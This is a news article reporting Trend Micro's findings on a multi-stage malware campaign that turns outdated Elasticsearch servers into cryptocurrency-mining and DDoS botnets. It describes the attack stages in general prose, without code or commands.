Vicious malware threatens to turn search engine into crypto-mining zombie botnet

Enterprise search engine Elasticsearch is under threat of being turned into a sophisticated cryptocurrency mining botnet to be used in distributed denial of service (DDoS) attacks.

Cybersecurity firm Trend Micro describes a new malware strain that launches multi-stage attacks on publicly accessible databases and servers that run old versions of Elasticsearch software.

“[…] Many of the malicious traffic or attacks that we see targeting Elasticsearch are relatively straightforward, and more often than not, profit-driven,” wrote Trend Micro.

“An attacker looks for unsecure or misconfigured servers or exploit old vulnerabilities, then drop the final payloads that typically consist of cryptocurrency-mining malware or even ransomware,” added the firm.

Not just a botnet, BillGates is here too

The malware works like this: First, it finds out-of-date servers, forcing them to download and execute a series of dangerous scripts with malicious search queries.

“The ways that the scripts are retrieved are notable,” said Trend Micro. “Using expendable domains, for instance, allows the attackers to swap URLs as soon as they are detected.”

The “first-stage” script attempts to shut down any firewall running on the target machine. It then kills any competing or already-running cryptocurrency mining process, before downloading another script that’s likely hosted by an already-compromised website.